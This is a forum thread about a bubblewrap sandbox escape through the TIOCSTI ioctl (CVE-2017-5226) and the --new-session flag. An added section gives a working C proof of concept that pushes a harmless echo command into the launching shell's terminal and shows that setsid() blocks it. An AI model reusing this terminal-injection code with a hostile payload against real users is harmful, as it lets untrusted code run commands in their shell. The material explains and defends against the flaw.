by rsa25519 1545 days ago
Note that a sandbox escape is often possible via TIOCSTI (CVE-2017-5226) [0] unless a special flag (--new-session) is used.

Bubblewrap is aware of this, yet their documentation gives no indication that this flag is necessary to produce a secure sandbox. In --help, the documentation of --new-session is simply "Create a new terminal session," which severely understates its importance.

It's frustrating to have such a useful tool be knowingly easy to misuse.

[0]: https://github.com/containers/bubblewrap/issues/142
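The escape the comment describes, as an added example that is not code from this thread, from bubblewrap or from nsjail: a sandboxed process that still shares the caller's controlling terminal can use the TIOCSTI ioctl to push bytes into that terminal's input queue, and the parent shell reads them as if the user had typed them. The program below tries the injection twice from a child process, once in the caller's session and once after setsid(), which is the syscall behind bwrap's --new-session; after setsid() the child has no controlling terminal and the kernel refuses TIOCSTI with EPERM (without CAP_SYS_ADMIN). It assumes Linux; the payload string and the helper names are this example's own. On kernels since 6.2 built without CONFIG_LEGACY_TIOCSTI, or with dev.tty.legacy_tiocsti=0, the ioctl fails with EIO in both cases.

```c
/* tiocsti_demo.c: build with `cc -o tiocsti_demo tiocsti_demo.c` and run from an
 * interactive shell. Added example; not from bubblewrap, nsjail or the thread. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Push every byte of `s` into the terminal's input queue with TIOCSTI.
 * Returns 0 on success, or -errno of the first failing ioctl
 * (ENOTTY for a non-terminal fd, EPERM when the caller's session does not
 * own the terminal, EIO when the kernel has TIOCSTI disabled). */
int tiocsti_inject(int tty_fd, const char *s) {
    for (const char *p = s; *p; p++) {
        if (ioctl(tty_fd, TIOCSTI, p) < 0)
            return -errno;
    }
    return 0;
}

/* Attempt the injection in a forked child. With new_session == 0 the child
 * stays in the caller's session (what bwrap does without --new-session);
 * with new_session == 1 it first calls setsid(), detaching from the
 * controlling terminal (what --new-session does). Returns 0 if the child
 * injected successfully, otherwise the child's -errno. */
int try_inject_in_child(int tty_fd, const char *s, int new_session) {
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -errno;
    if (pid == 0) {
        if (new_session && setsid() < 0)
            _exit(errno);
        int r = tiocsti_inject(tty_fd, s);
        _exit(r == 0 ? 0 : -r);      /* exit status carries errno */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -errno;
    return WIFEXITED(status) ? -WEXITSTATUS(status) : -ECHILD;
}

/* Open a descriptor that is not a terminal (read end of a pipe), so the
 * failure path can be exercised where no terminal is available. */
int open_nontty_fd(void) {
    int fds[2];
    if (pipe(fds) < 0)
        return -1;
    close(fds[1]);
    return fds[0];
}

int main(void) {
    if (!isatty(STDIN_FILENO)) {
        fprintf(stderr, "stdin is not a terminal; nothing to inject into\n");
        return 1;
    }
    /* Constructed payload: a harmless command line. If injection succeeds,
     * the shell that launched this program reads and runs it after exit. */
    const char *payload = "echo INJECTED-VIA-TIOCSTI\n";
    int r_same = try_inject_in_child(STDIN_FILENO, payload, 0);
    int r_new  = try_inject_in_child(STDIN_FILENO, payload, 1);
    printf("same session   : %s\n", r_same == 0 ? "injected" : strerror(-r_same));
    printf("after setsid() : %s\n", r_new  == 0 ? "injected" : strerror(-r_new));
    return 0;
}
```

Running it from a terminal on a kernel that still allows TIOCSTI shows the first attempt succeeding, with the echo command appearing at the shell prompt and executing, and the second attempt failing with "Operation not permitted". This is the difference between `bwrap ... cmd` and `bwrap --new-session ... cmd` when the sandboxed command is untrusted: without --new-session, the sandboxed process can type into the terminal that launched it.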

2 comments

FWIW, it's disabled in nsjail by default https://github.com/google/nsjail/blob/6483728e2490c1fc497a81... with a relevant comment.